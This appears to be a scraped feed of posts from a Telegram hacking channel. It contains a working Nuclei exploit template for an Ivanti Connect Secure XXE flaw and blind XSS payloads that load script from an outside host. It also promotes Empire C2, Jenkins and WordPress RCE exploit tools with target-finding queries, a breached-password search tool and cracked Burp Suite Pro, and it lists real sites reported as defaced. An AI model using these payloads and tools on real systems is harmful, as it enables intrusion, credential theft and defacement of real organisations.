Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  denoscription: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950

#Nuclei #Templates #PoC #XXE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥩 PDF

#Wordlist #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

👁‍🗨 Mirror-h

Country: 🇺🇸🇹🇭

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👑 Empire 👑

💬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:

cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh

😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Linux for Hackers: LINUX commands you need to know

⬇️ Download

#linux #hacker #video
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👁 Burpsuite Pro 👁

🔥 v2024.1.1.1

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/

👁‍🗨 Mirror-h

Country: 🇺🇸🇪🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

✅ H1 asset fetcher ✅

💬
This h1finder.sh is noscript which collect all program names and then collect all assets and save it into wild and non-wild domains

You can get your API key from 👉HackerOne👈

🔼 Installation:

cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/

💻 Usage:

h1finder -t <token> -u <username> -b <true/false>

⚪️ -t = H1 token
⚪️ -u = h1 username
⚪️ -b = true or false, if you want bounty only target set it to true if you want vdp only set it to false

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

‼️ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 ‼️

Query Fofa: body="/wp-content/themes/bricks/"

📞 PoC
🌐 Nuclei Template

#BugBounty #Tips #Nuclei #Template
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👺 Free query shodan 1000 result IP "Tips bug bounty" 👺

Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip

Download source page

Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Denoscription:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

or

python CVE-2024-23897.py -i <input_file> -f <file>

📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

10000 h1 disclosed reports

💬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
🔒 BugCod3

#Python #H1 #Report
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 DigitalOcean OpenVPN/SOCKS for Burp Suite

💬
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

👁‍🗨 How to use:
🔤 Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
🔤 Load the extension in Burp via the Extensions tab;
🔤 Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
🔤 Select an OpenVPN configurataion file (.ovpn)
🔤 Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
🔤 Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

📊 Features:
⚪️ Remember your DigitalOcean API token;
⚪️ Remember your OpenVPN configuration file and credentials (optional) per project file;
⚪️ Automatically shut down the droplet when Burp closes or the extension is unloaded;
⚪️ A context menu so you can right-click > enable or disable tunnelling through the VPN
⚪️ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

😸 Github

⬇️ Download
🔒 BugCod3

#Burp #Extension #bugbounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵

𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟: "target/lib/css/animated.min.css"

𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
"/lib/css/animated.min'"/><noscript%20>alert(document.domain)<%2fnoscript>.css"

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This is very cool. Get cheatsheets in your terminal with a curl command!

⌨️ Try this:
curl https://cht.sh/sqlmap

#Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

💀 LeakSearch 💀

💬
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
⚪️ Python 3
⚪️ Install requirements pip install -r requirements.txt

💻 Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Search #Parse #Password
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3